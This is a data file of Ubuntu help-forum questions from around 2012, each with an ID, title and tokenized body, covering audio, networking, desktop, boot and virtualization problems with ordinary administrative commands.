219739	adjust max possible volume in pulseaudio	somtimes some sound/movie/music on my ubuntu_12.04 system is at a very low volume by itself . henceforth i increase the volume of the sound output . i can use the following setting ( see screenshot ) it seems therefore that pulseaudio is able to increase the volume beyond the maximum that appears possible by merely using the `` increase-volume '' buttons of the machine . my questions is how i can adjust pulseaudio to allow a greater range or a higher max volume increasing ? ? ? especially with some audio material that is at a very low volume to start with it would be nice to be able to swiftly increase the output volume ( powerup ) to a higher setting than maybe necessary to other -already quite loud- material .
219740	network connection failure : `` network disconnected ''	i 'm using ubuntu 12.10 , and have a zantel modem ( model : huawei ec122 ) which is a cdma modem . i have been trying to connect to the internet but every time it loads it says `` network disconnected '' does anyone know a simple solution to this ? i would prefer a gui solution , as i 'm not very good at using the terminal .
219743	how do i make dash only show installed applications by default ?	while it 's easy to use the filter in dash in ubuntu 12.10 to show only the installed programs ( and not offer suggestions ) , i 'd like to make this permanent . as it stands , you have to reset it each time you boot your machine .
219746	stuck getting gnome classic as default	i am trying to set up gnome classic ( on ubuntu 12.04.1 ) to be my default desktop , i can install it without issue and i know how to change to it at the login screen . the problem i have is when i reboot , the login screen defaults back to unity for login , is there away to set gnome classic to be the default ( without removing unity ) ? i have installed and configuring as follows but it always defaults to unity apt-get install gnome-session-fallback indicator-applet-appmenu gnome-tweak-tool and enable /usr/lib/lightdm/lightdm-set-defaults -s gnome-classic also have the following in /etc/lightdm/lightdm.conf [ seatdefaults ] user-session=gnome-classic greeter-session=unity-greeter greeter-show-manual-login = true allow-guest=false
219753	how to remove kdewallet ?	! [ enter image description here ] [ 1 ] i recently saved my svn passwords in kdewallet now everytime i update from svn or commit it asks me for kde password . how do i either remove the completely the kdewallet or atleast the svn password from kde . i tried using command line kdewalletmanager but it says kdewalletmanager : command not found i can not upload a image here as i am new here , , , here is the image url http : //s12.postimage.org/htkzh8qzx/untitled.gif
219757	how to enable ssh access using root account	i have enabled the password for root using the command # passwd root and now i want to connect to the server via ssh as root . i am unable to do this and somehow the root account can not be accessed via ssh . what is the name of the file i have to edit and allow root login . i have ubuntu server 10.04 lts
219759	dual monitor resolution ok for one user , but garbled for a new user	ubuntu 12.04 on pc with ati card using built-in drivers . gnome classic ( no effects ) a dual monitor setup works perfectly for admin user a , with both screens showing at 1280 x 1024 . new admin user b created , also set to gnome classic ( no effects ) , when logging in the monitors are mirrored by default . looks ok . using system tools / system settings / displays , change settings to be exactly as user a , not mirrored , 1280 x 1024 . apply and screen is garbled , even though settings for user a & b are absolutely identical . if i drop the resolution down for user b , i can get a result . i 've tried copying and manipulating the ~/.config/monitors.conf but no good results for 1280 x 1024 .
219760	can not get upstart to run user job	i am trying to get upstart start a user job during the boot of my machine . i have my conky.conf upstart config file in my $ home/.init directory . wenn i run `` start conky '' i get this error : dre @ dre-laptop : ~ $ start conky start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.76 '' ( uid=1000 pid=2843 comm= '' start conky `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) dre @ dre-laptop : ~ $ i ( think i ) know that this error has to do with the d-bus system ( authentification ) . i also read ( http : //upstart.ubuntu.com/cookbook/ # id96 ) that ubuntu 12.10 already has the right configuration in the d-bus config file `` /etc/dbus-1/system.d/upstart.conf '' to allow normal users to use upstart . dre @ dre-laptop : ~/.init $ cat conky.conf description `` conky , a system monitor appled '' start on lightdm stop on shutdown # automatically restart process if crashed respawn # essentially lets upstart know the process will detach itself to the background # expect fork # start conky exec /usr/bin/conky so , who knows , what do i do wrong ? ? ? greetings andre no one ? ? ? please ... give me your best shot .
219762	are there any tiling window managers compatible with unity3d ?	i used to run xmonad with unity 2d which i really love , but since ubuntu 12.10 the unity 2d is no more . are there any other tiling window managers that runs well with unity ( 3d ) ? edit : i fell back to use gnome panel and xmonad . the pre-configured gnome-panel is n't as bad as it was a few releases ago . although i still miss the global menu bar .
219764	kubuntu dsl network problems	ok so here is the problem , i want to reinstall kubuntu 12.04 lts on my pc but i can not connect to any internet , because the network manager wont let me.i have internet through pppoe but the problem is i need to let the `` service '' field empty but it wont let me , i encountered this with 12.04.1 but i said `` what the heck , lets start install '' , but to my disapointment i didnt had no network after installation.after that ive downloaded 12.04 dvd again same problem i can not let `` service '' field empty and because of that i have no internet how can i do it ? i had ubuntu 12.04 before with unity and after that i installed kde on it , but because of some unkown issues after sometime my graphic driver broke down , dont know what happened i couldnt install , remove , purge the driver so i installed a fresh copy of kubuntu , all well but i realised that the installment was 12.10 and i wanted 12.04 cause is lts ( appearently the downloads arent properly linked ) .
219768	active directory user + upgrade to 12.10 - > empathy is ko	i 'm facing a pretty annoying bug . i 've just upgraded my computer from 12.04 to 12.10 . on 12.04 , my user account was connected to my active directory server , this also works after the upgrade . since the upgrade , i had to install my online accounts , ok . but now , empathy does n't see these accounts . the empathy window shows `` you need to setup an account to see contacts here '' and the `` account settings '' button . if i click this button , i see the accounts i previously created . within the `` online accounts '' window , for each account , i can see empathy with a button `` options '' , if i click this button , i get and empty applet , with just the `` cancel '' and `` done '' buttons . and so , empathy does n't work ! any help would be greatly appreciated , thanks .
219769	software-center stopped working after crash	after a computer crash i had to reboot and since then ubuntu software-center no longer works for me . i 'm trying to uninstall it but i 'm getting an error message : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) is another process using it ?
219770	black screen when i installed ubuntu on vmware	i 've installed ubuntu desktop on vmware 7.0.1 , but after installation i rebooted the machine and then i got nothing except black screen . what should i do ? i 've installed ubuntu server on vmware7.0.1 , but after installation i got nothing except black screen displaying this msg : please wait ! vmware tools is currently begin installed on your system . depending on the version of ubuntu you are installing , you may log in below and use the system during the installation . otherwise , please wait for the graphical environment to launch what should i do ! ?
219773	disk utility . format cd-rw to blanck : error creating filesystem	i got this error when i went to format a rewritable cd with disk utility . disk was unmounted as demanded . error creating file system : helper exited with exit code 1 : error calling fsync ( 2 ) on /dev/sr0 : input/output error what can it be ?
219774	folder with pipes in the filename missing	i have been backing up my folders , i am using seagate expansion portable drive . i had created a folder called `` |o|o '' in the root folder of the portable drive ... i copied my latest folders into `` |o|o '' folder to re-install ubuntu . when i open the portable drive the folder |o|o is not visible , when i ctrl+a and check properties the space used is 122gb , however when i click on the drive to view properties of the drive used space is 260gb . it looks as if the folder is there in the portable drive but i can not access it ... i have tried to view all the hidden files and `` |o|o '' is still not there . i am using 12.04.can you please help me to retrieve this folder .
219777	will ubuntu and games like dota 2 and league of legends work on my computer ?	it is an acer aspire 5742g notebook : intel i3 2.53 mhz , 3 gb ddr 3 , hdd 500 gb , video intel hd g with 256mb ( on w7 on this graphic board run windows ) and a nvidia 520m 1gb video
219779	how to define specific urls like 'localhost ' ?	the same way 'localhost ' in the url points to /var/www/ i would like to put http : //courses/somehting/somthing/moresomthings/ ... . and it would always point to /var/www/courses.php this is to work on my local machine only . how should i approach this ?
219782	how do i type text on top of a pdf ?	i 've been given a form to fill out as a pdf . it is not a fillable pdf , it 's just a file that i 'm expected to print out , fill in by hand , and scan back in . is there something available in the software center that will let me type text on top of a pdf ?
219784	can not connect ubuntu to iphone 5 hotspot	i am a real novice with ubuntu . a friend gave me a laptop with it installed . it did n't seem to have a problem picking up the wifi at work , but i have just got an iphone 5 and am using it as a hotspot ( it works for my android tablet ) i think there is a problem with the settings . i can open the network manager , but it says the wireless network is unmanaged , and i can not turn the switch to on ( i can click it but it refuses to stay in the on position ) . i am a real newbie here . if anyone can help , it would be greatly appreciated . thanks in advance , sam
219785	bypass my wireless card	since i can not get my wireless card broadcom bcm4313 working properly at home , i thought i could buy a usb wifi external adapter ( i found this dlink dwa-125 ) . would this device bypass bcm4313 and its related driver ? could i get a decent speed connection this way ?
219789	failed to download repository	while trying to upgrade to 12.10 got the msg : failed to download repository information.check your internet connection.pinging twocows.com works . any help ?
219791	improve gui appearance of wine applications	in many cases windows programs run ok in wine , but there is still the annoying problem of their appearance . how to make things look better in wine , especially fonts ? p.s . feel free to edit this question in order to specify other aspects that could be improved beside fonts
219796	how can i temporarily suspend nautilus filesystem automounting , without making permanent changes to the system and user configuration ?	i have written a tool which automatically formats and copies files to usb flash drives when they are inserted . it needs the drive to be unmounted to format it . normally nautilus will automatically mount the drive when inserted , so i have to wait for this to happen and then unmount the drive before formatting it . the only problem is that if the user has disabled automounting then my program will wait forever . i could change the dconf auto-mount setting when my program starts , and then change it back when it exits , but this is not a good solution because the setting wil not be restored if my program crashes . how can i temporarily prevent nautilus from automounting usb drives only during the time when my program is running ?
219801	dual head switching problem	my media player runs ubuntu 12.10 with video drivers gallium 0.4 on amd rv710 , experience standard . the graphics card is reported ( lshw ) as a radeon hd 4350 . this card is driving two displays . the first is a 17 '' dell 4:3 monitor via dvi at around 800:600 pixels . this houses the launcher and a few screenlets and always remains on . it is the only screen i have on at boot . the second display is an lcd 16:9 tv of 42 '' via hdmi at 1920:1080 pixels . this is switched on occasionally when required . the display is then extended so that the dell is on the left and the tv the right , with the tops of each display aligned . the problem occurs on transitions from switching the tv on or off - though the problem is more common when switching on from single to dual extended display . the symptom is that more often than not , when the tv is turned on , and the driver detects it , it corrupts the initialisation . switching off and on again a few times fixes it . on rare occasions switching off causes the single display to be corrupted . again , switching on and off again usually cures it in one . i had a similar problem in 12.04 until i finally got the dual head to work properly with the proprietary drivers , after which it worked consistently well . so my question . as the driver is perfectly capable of initialising and running my two displays , why does it so often fail to do so , and is there anything i can do to make it work more consistently ? tia
219806	kwin 's wobbly windows do not work any more since i tried `i915_rc6_enable=1`	i recently tried to boot my kubuntu 12.04 lts on my sandy bridge laptop with i915.i915_enable_rc6=1 , i915.i915_enable_fbc=1 and i915.lvds_downclock=1 . i had some issues with 3d performance where somebody suggested using those options . since the resolution was not set correctly , i just tried it again with i915.i915_enable_rc6=1 , i915.i915_enable_fbc=1 . then i rebooted and did not set any options manually , so everything should be reset . but since then , some kwin effects , especially wobbly windows does not work any more . i also tried to boot some older kernel , but that did not have any effect . how can i get it back to work ?
219808	how do i open weblinks with firefox , not gedit ?	i save links as files , rather the using bookmarks . i just drag the url field from firefox onto my desktop/folder . recently these stopped opening in firefox , and started `` opening '' in gedit . even in gedit , the file errors . the only way i can open these to even see the link is by using vim , having navigated to the file from the terminal . there are a number of threads with similar problems , to solutions to which i have tried to no avail . < this thread > describes exactly my problem , but no solution is posted . example url file contents : [ desktop entry ] encoding=utf-8 name=link to google type=link url=http : //www.google.com icon=text-html contents of my ~/.local/share/applications/mimeapps.list : [ added associations ] application/x-rpm=ubuntu-software-center.desktop ; x-scheme-handler/mailto=thunderbird.desktop ; message/rfc822=thunderbird.desktop ; application/x-extension-eml=thunderbird.desktop ; inode/directory=vlc.desktop ; application/pdf=inkscape.desktop ; kde4-okularapplication_pdf.desktop ; text/x-python=vim.desktop ; gedit.desktop ; application/pgp-keys=libreoffice-calc.desktop ; image/x-hdr=gedit.desktop ; text/plain=libreoffice-calc.desktop ; audio/x-vorbis+ogg=totem.desktop ; application/octet-stream=gedit.desktop ; x-scheme-handler/ftp=firefox.desktop ; x-scheme-handler/chrome=firefox.desktop ; text/html=firefox.desktop ; application/x-extension-htm=firefox.desktop ; application/x-extension-html=firefox.desktop ; application/x-extension-shtml=firefox.desktop ; application/xhtml+xml=firefox.desktop ; application/x-extension-xhtml=firefox.desktop ; application/x-extension-xht=firefox.desktop ; [ default applications ] x-scheme-handler/mailto=thunderbird.desktop message/rfc822=thunderbird.desktop application/x-extension-eml=thunderbird.desktop application/pdf=kde4-okularapplication_pdf.desktop text/html=firefox.desktop x-scheme-handler/http=firefox.desktop x-scheme-handler/https=firefox.desktop x-scheme-handler/about=chromium-browser.desktop x-scheme-handler/unknown=chromium-browser.desktop audio/x-vorbis+ogg=totem.desktop x-scheme-handler/ftp=firefox.desktop x-scheme-handler/chrome=firefox.desktop application/x-extension-htm=firefox.desktop application/x-extension-html=firefox.desktop application/x-extension-shtml=firefox.desktop application/xhtml+xml=firefox.desktop application/x-extension-xhtml=firefox.desktop application/x-extension-xht=firefox.desktop and here is a screen-shot of gedit trying to open these : any help super appreciated , as this is driving me crazy .
219811	eclipse juno wo n't open gui java apps when run with gksudo	i have eclipse juno installed on ubuntu 12.04 . when i run from the command line with sudo , everything works fine . however , when i follow the advice i see everywhere and run it with gksudo , i get the following exception whenever i to run anything with a gui : no protocol specified no protocol specified exception in thread `` main '' java.lang.internalerror : ca n't connect to x11 window server using ':0 ' as the value of the display variable . at sun.awt.x11graphicsenvironment.initdisplay ( native method ) at sun.awt.x11graphicsenvironment.access $ 100 ( x11graphicsenvironment.java:52 ) at sun.awt.x11graphicsenvironmnent $ 1.run ( x11graphicsenvironment.java:155 ) at java.security.accesscontroller.doprivileged ( native method ) at sun.awt.x11graphicsenvironment. < clinit > ( x11graphicsenvironment.java:131 ) at java.lang.class.forname0 ( native method ) at java.lang.class.forname ( class.java:169 ) at java.awt.graphicsenvironment.getlocalgraphicsenvironment ( graphicsenvironment.java:68 ) at sun.awt.x11.xtoolkit. < clinit > ( xtoolkit.java:89 ) at java.lang.class.forname0 ( native method ) at java.lang.class.forname ( class.java:169 ) at java.awt.toolkit $ 2.run ( toolkit.java:834 ) at java.security.accesscontroller.doprivileged ( native method ) at java.awt.toolkit.getdefaulttoolkit ( toolkit.java:826 ) at java.awt.toolkit.geteventqueue ( toolkit.java:1689 ) at java.awt.eventqueue.invokelater ( eventqueue.java:1032 ) at javax.swing.swingutilities.invokelater ( swingutilities.java:1267 ) at codetests.dialogtest.main ( dialogtest.java:72 ) what do i need to change so i can run with gksudo and have this work ?
219812	multiply with decimal numbers in bash	when i run p=0.1 k=2 while [ $ p \ < 1 ] do echo $ p p= $ ( echo `` scale=2 ; $ p* $ k '' | bc ) done i have this result 0.1 .2 .4 .8 what can i do to have 0.1 , 0.2 , 0.4 and 0.8 ?
219813	how to update my intel video card	my video card is an intel corporation n10 family integrated graphics card how do i update it ?
219814	ca n't open a port	i need to run an app on my computer which connects to local port 49100 . so everything runs on one computer . i tried adding rules to gufw , firestarter , manually : sudo iptables -a input -p tcp -- dport 49100 -j accept but when i look at opened ports 49100 is not listed ! and my app can not connect to local debugger therefore . i ran : sudo netstat -anltp | grep `` 49100 '' it returns nothing .
219816	building & running c program in eclipse juno in 12.04	i have recently installed ubuntu and eclipse to compile a library ( written by someone else ) . i am familiar with c and thus i added all the relevant header files in a a folder and added the path to that folder in the project > properties > paths > gnu c. in the src folder i have a .c file with the main function and several .c files provided in the package which are called in the main .c file ( not named but ) . this is the output after i build the project ( using toolchain linux gcc and gnu builder ) : 15:43:57 **** incremental build of configuration release for project delaunay_test **** make all building file : ../src/detri.c invoking : gcc c compiler gcc -i/media/hdd/programming/c/detri_2.6.a/headers -o3 -wall -c -fmessage-length=0 -mmd -mp -mf '' src/detri.d '' -mt '' src/detri.d '' -o `` src/detri.o '' `` ../src/detri.c '' in file included from /media/hdd/programming/c/detri_2.6.a/headers/trist.h:8:0 , from /media/hdd/programming/c/detri_2.6.a/headers/dt.h:8 , from /media/hdd/programming/c/detri_2.6.a/headers/detri.h:5 , from ../src/detri.c:41 : /media/hdd/programming/c/detri_2.6.a/headers/basic.h:65:8 : error : conflicting types for ‘bzero’ /media/hdd/programming/c/detri_2.6.a/headers/basic.h:66:8 : error : conflicting types for ‘bcopy’ /media/hdd/programming/c/detri_2.6.a/headers/basic.h:100:0 : warning : `` hibits '' redefined [ enabled by default ] /usr/include/values.h:48:0 : note : this is the location of the previous definition /media/hdd/programming/c/detri_2.6.a/headers/basic.h:102:0 : warning : `` hibitl '' redefined [ enabled by default ] /usr/include/values.h:49:0 : note : this is the location of the previous definition /media/hdd/programming/c/detri_2.6.a/headers/basic.h:204:0 : warning : `` powerof2 '' redefined [ enabled by default ] /usr/include/i386-linux-gnu/sys/param.h:72:0 : note : this is the location of the previous definition ../src/detri.c:110:6 : warning : return type of ‘main’ is not ‘int’ [ -wmain ] make : *** [ src/detri.o ] error 1 15:43:58 build finished ( took 328ms ) if i change the toolchain to mingw or something else , its states that it is unsupported on this system but builds anyway . when the build is done , running it yields the following error message : binary not found any help is appreciated .
219819	' can not find -lboost_iostreams ' while trying to install deluge 1.3.3	while trying to install deluge 1.3.3 ( i need this specific version ) i get an error . i install all the needed packages through sudo apt-get install g++ make python-all-dev python-all python-dbus \ python-gtk2 python-notify librsvg2-common python-xdg python-support \ subversion libboost-dev libboost-python-dev \ libboost-thread-dev libboost-date-time-dev libboost-filesystem-dev \ libssl-dev zlib1g-dev python-setuptools \ python-mako python-twisted-web python-chardet python-simplejson i then build it $ python setup.py build and $ sudo python setup.py install then i get a long list at the end of which there is the error /usr/bin/ld : can not find -lboost_iostreams collect2 : ld returned 1 exit status error : command 'gcc ' failed with exit status 1 can you help me out with this ?
219821	if i intend to use hadoop is there a difference in 12.04 lts 64 desktop and server ?	sorry for such a newbie question , but i 'm looking at installing m3 edition of mapr the requirements are at this link : http : //www.mapr.com/doc/display/mapr/requirements+for+installation and my question is this , is the desktop kernel 64 for 12.04 lts adequate or the `` same '' as the server version of the product ? if i 'm setting up a lab to attempt to install a home cluster environment should i start with the server or dual boot that distribution ? my assumption is that the two are the same . that i can add any additional software to the 64 as needed . can anyone elaborate on this ? have i missed something obvious ?
219824	how do i lock the screen before hibernating ?	so when i hibernate my laptop the screen does n't lock automatically . to solve this i 've changed /etc/acpi/powerbtn.sh to contain : su - myusername -c `` gnome-screensaver-command -l '' sudo pm-hibernate exit 0 when running this file from a command line it works as intended ( ie , lock the screen and then hibernate ) . unfortunately , when pressing the power button , it still just hibernates without locking the screen -what am i missing ? edit : i 've added the line whoami > > ~/desktop/test.txt to verify which user is executing the /etc/acpi/powerbtn.shscript . when pressing the power button , the file test.txt is created , but is empty . from this i conclude that the script is in fact being called when pressing the power button . what i do not understand is how the output of whoami can be empty ...
219827	webcam 's image upside down and with zoom	i 'm trying do my notebook 's webcam works on skype 4.1 , but i am not having success . the problem is that the webcam 's image appears upside down and with zoom . this problem do n't happen on skype version 2.1 ( beta ) . on skype 2.1 ( beta ) my webcam works perfectly . however , on skype 4.1 the webcam 's image is upside down and with zoom . i managed to solve only the upside down problem with the following commands : export libv4lcontrol_flags=3 ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so skype after these commands the webcam 's image become normal , but the image is still zoomed . i could not solve the zoom problem . to work around this i 'm obligated to use the both versions ( 2.1 ( beta ) and 4.1 ) . does anyone know a way to make the image from my webcam stay perfectly normal ? these are the information about my webcam : bus 002 device 003 : id 0c45:62c0 microdia sonix usb 2.0 camera it uses the driver uvcvideo . i 'm using the ubuntu 12.04 64 bits .
219828	getting .deb package dependencies for an offline ubuntu computer through windows	basically i want to `` batch '' download a .deb file and all its dependencies at once on a windows 7 machine ( of which i do not have admin access , it is a public computer . ) i 've seen plenty of ubuntu based fixes that require terminal and apt , i 'm asking how to do this on windows . ( i am not sure if this question fits here but i have n't found anywhere else that it could go . ) i 've tried keryx and sushi-huh to try to get packages and their dependencies but these both require python , python ca n't be normally installed without admin permission . ( side note , i think i 've seen programs bundle python so they can work without installing it to c : , is this possible as a workaround ? google is n't helping ) if anyone wants to know i 'm trying to download krita and blender for ubuntu 12.10/amd64 i have been able to manually download single .deb files and dependencies upwards to 38 dependent packages , but then those 38 packages depend on other packages , it 's maddening to not have some way to automatically do this on windows . *edit sorry i forgot to make it clear that my personal home computer is running ubuntu 12.10 and the public computer i 'm using to download is windows 7
219830	give write access to usb and serial devices automatically	i am working with some usb and serial micro-controllers . everytime i plug a device i have to do the following command to give it write access , and also my password : sudo chmod 666 /dev/ttyusb0 can i set my ubuntu to automatically give write access to pluged in devices ? if not , how can i make a batch file that i can easily give the access to port i want for example if i run the following command it does the job : giveaccess -usb0
219831	redirect system sound to audio card ( headphones ) ?	i execute some background scripts , and need to know when they end . for this i play system beeps . the thing is i just moved in an open space , and i do n't want to annoy my co-workers with beeps every ten minutes ... i 've searched the web looking for a solution and still did not find any satisfying answer . is there a way to play system beeps in my headphones instead of the motherboard speaker ?
219835	use command line to add application to gnome classic panel ?	how can i add an application shortcut to a panel in gnome-classic , using the command line ? i used dconf watch / to see what was happening when i did it by hand , but when i try reproducing that myself : dmd @ rossum : ~ $ dconf write '/org/gnome/gnome-panel/layout/objects/test1234/object-iid ' 'panelinternalfactory : :launcher' error : 0-1 : unknown keyword i run into trouble right away . how can i add ( e.g . ) a terminal launcher icon to a panel using the command line ?
219839	ubuntu 12.04 ( dual boot with windows 7 ) , does n't boot after i deleted some files from windows . what can i do ?	the ubuntu 12.04 i have installed ( in dual-boot with windows 7 ) using wubi worked perfectly for over a month . then it informed me that i ran out of space on the hard drive and i assumed it was because my hard drive on windows was full . i logged into windows and deleted the whole new volume d. but now the problem is that it is not possible to log into ubuntu but in windows it 's possible . i really paid attention about not deleting important files in windows . when i try to log into ubuntu : _either it does not go far and i have to restart the computer _or it goes until the loading time and a message says something like `` [ ... ] graphics could not be detected [ ... ] '' and they ask to choose between 4 options including `` start with poor graphics '' , `` reconfigure graphics '' , `` troubleshoot '' and `` restart the computer '' . but none of the options run and i also have to restart the computer manually from that point i have plenty of useful files in ubuntu so i want to find another way to solve the problem instead of uninstall/reinstall ubuntu . i want to know what happened ? and how to make it work ? thank you , bcbc : wubi was not installed on d : for sure . xtremesupremacy3 : just before the problem occured , ubuntu was saying there was no disk space left ( so now i can not reinstall the grahics driver due to lack of space ) , i logged in to windows and deleted all the folders from new volume d : after that ubuntu started having problems loading and the `` running in low graphics mode '' screen appears every time . i am trying to update the graphic card driver but i do not seem to be able to install anything due to the lack of storage space . how can i delete files but not all of them to clear up just enough space to get the graphic card driver so i get move on from there ? thank you in advanc
219841	lightest weight ubuntu desktop for text editing in big terminal windows ?	i have an older windows laptop onto which i 'm installing ubuntu within a vm . my goal is just to use terminal-based linux tools such as vim and shell scripting . i do n't give a hoot about any gui for this box . so i first installed ubuntu minimalcd and chose `` basic ubuntu server '' . upon boot , the text-based terminal came up and i logged in , but the problem is it only gives me 80 columns . i want to do terminal mode vim but have a couple hundred columns to take advantage of my large monitor . if you happen to know how to do that , please see my question here . this post is assuming that the other question is not answerable , and that i will need a desktop to get more than 80 columns in a terminal window . so if that is the case , i want the lightest weight one possible , because this is older hardware and all i want is the ability to have nice big text-based terminal windows for editing text . from the ubuntu minimal cd , i see options for edubuntu , kubuntu , etc . which one of the available desktops would be a good choice for my needs ?
219846	is the alternate ubuntu installer still required for lvm or software raid setup ?	over the past 5 years , i have been setting up ubuntu servers using the alternate installer . i need to provision a new server today , and i 'm curious if the alternate cd is still the only way to setup lvm/raid at installation time . i 'm my limited experience with red hat enterprise linux , i noticed it 's single installer configures lvm automatically . has ubuntu 's installer , at least the standard `` server '' installer , added support for lvm/raid , or is the alternate installer still required for that kind of server setup ? http : //mirror.anl.gov/pub/ubuntu-iso/dvds/ubuntu/12.04.1/release/ alternate install cd the alternate install cd allows you to perform certain specialist installations of ubuntu . it provides for the following situations : setting up automated deployments ; upgrading from older installations without network access ; lvm and/or raid partitioning ; installs on systems with less than about 384mib of ram ( although note that low-memory systems may not be able to run a full desktop environment reasonably ) . lvm has always been fundamental for our server needs , so i 'm surprised if it is still not considered a server-worthy feature .
219849	how to change grub-bios to grub-efi	so a while ago i installed ubuntu on my macbook . i had to reinstall it because something in the update manager messed up . not to concerned about that but for some reason after the installation ubuntu wo n't boot . i found out later that apple hardware uses efi as its firmware ( bios is the wrong term ) . every time i try to install it i make a swap space and the root file to make the installation . i noticed that when i make the boot file its in grub-bios . i need to change this to grub-efi . i found out but there is no option to change this . it still wo n't boot though . when i install it i do n't get any errors but doing a little bit of reasearch i find that the boot file may be the problem . how to fix this ?
219851	permission denied for some files , even with sudo and chmod 777	i 've had multiple times that i was n't allowed to edit a file . even when i chmoded to 777 and opend the file with sudo . e.g . the file /sys/kernel/debug/vgaswitcheroo/switch in this tutorial . first , how is this possible ? second , how can i get access to this sort of files ?
219853	how does one use ubuntu for android ?	i have heard a lot about this new ubuntu for android but how can the average man download and install this neat new feature ! ! thanks
219868	dashboard does n't see font viewer	why ubuntu 12.04 dashboard does n't show `` font viewer '' ? gnome-font-viewer.desktop file is present in /usr/share/applications with entry nodisplay=true running gnome-font-viewer in console immediately asks for a font name which is totally unusefull . how can we use this tool in a convenient windowing mode ?
219869	i removed ubuntu from the bios menu but it comes back	for reasons too long to explain , i reluctantly removed ubuntu from my computer . after completely removing it and deleting the partition that it was installed onto , i discovered that i still had two ubuntu entries in the boot order in my bios menu . i deleted them by following the instructions in this answer : http : //askubuntu.com/a/63613/54934 as i was doing it , everything appeared to go smoothly . however , upon reboot one of them came back . what 's going on here ? how do i delete it permanently ? here is my boot-info url : http : //paste.ubuntu.com/1372806/ i 'll gladly provide any other information that may be needed to diagnose the problem . thanks .
219870	can not get virtualbox to install properly on ubuntu 12.04	i can not get virtualbox to install properly on my 12.04 . i first went with a manual install for the .deb from the old builds section of the virtualbox page . that .deb opened up the software center and installed . then i got the error coming up of vt-x/amd-v hardware acceleration is not available on your system . your 64-bit guest will fail to detect a 64-bit cpu and will not be able to boot . which i can only assume was due to my ubuntu version being 32-bit ( system details - > overview - > oc type : 32-bit , right ? ) so i followed these instructions to remove the .deb manually , restarted my laptop , and then found the actual virtualbox install in the software center and installed from that ( assuming it would give me the correct version i need for my system ) so after all that ( and then some ) , i 'm still getting the same error when i connect to my new job 's project in virtualbox . can anyone point me in the right direction of what to do here ? this is the first time i 've ever worked with virtualbox , and no one at this company is using ubuntu , so i 'm on my own here . edit : here is the direct info from running the 2 suggested commands inspiron-1750-brick : ~ $ lscpu architecture : i686 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 2 on-line cpu ( s ) list : 0,1 thread ( s ) per core : 1 core ( s ) per socket : 2 socket ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 23 stepping : 10 cpu mhz : 2100.000 bogomips : 4189.45 l1d cache : 32k l1i cache : 32k l2 cache : 2048k inspiron-1750-brick : ~ $ cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) core ( tm ) 2 duo cpu t6500 @ 2.10ghz stepping : 10 microcode : 0xa07 cpu mhz : 1200.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm dtherm bogomips : 4189.80 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) core ( tm ) 2 duo cpu t6500 @ 2.10ghz stepping : 10 microcode : 0xa07 cpu mhz : 1200.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm dtherm bogomips : 4189.45 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management :
219872	ubuntu consumes battery and warms laptop	i have ubuntu 12.10 ( 12.04 and upgraded to 12.10 ) . after upgrading i deleted old graphic drivers and instal fglrx ( or smth similar ) to get graphic interface . but after upgrade , battery consumption is high ( it last about 90min , and before easily up to 4 hours ) and laptop is warming up ( it feels hot under it , and area where asdfg buttons are ) . also , in system settings under graphics it 's : intel速 sandybridge mobile x86/mmx/sse2 laptop is lenovo thinkpad e520 . is there any way to correct this ? laptop have dual graphics ( intel and ati ) , and it would be nice to switch it somehow or
219874	windows 8 wo n't boot after installing ubuntu , 'device format invalid '	i had windows 8 installed on a partition . installed ubuntu 12.10 on another , it works fine , but when i try to boot windows 8 , it says error : device format `` ldm/84ec4a8-84ad-11e1-a109-002655b2e743/volume1 '' invalid : must be ( f|h ) , with 0 < = n < 128 . press any key to continue ... and then on the next screen a disk error occured press ctrl+alt+del to restart
219876	sync music with android via wifi	is there a possibility to sync music between ubuntu and an android device without cloud services ? something like itunes in the ios world or winamp for windows users . [ edit ] as farid pointed out in his answer , there is syncness . but as i read about it , it does n't seem to have that auto magic appeal of itunes or winamp , where the sync is triggered when both devices are in the same wifi . also there is the need to have a folder share accessable .
219880	resize ubuntu 10.04 virtualbox vm virtual disk	how do i resize my virtual disk space ? i 'm running ubuntu 10.04 lts with only 8gb ( which is the default allocated size ) but it 's running low on disk space . thanks . here 's the screenshot . thanks to @ suhaib for the +points in reputation .
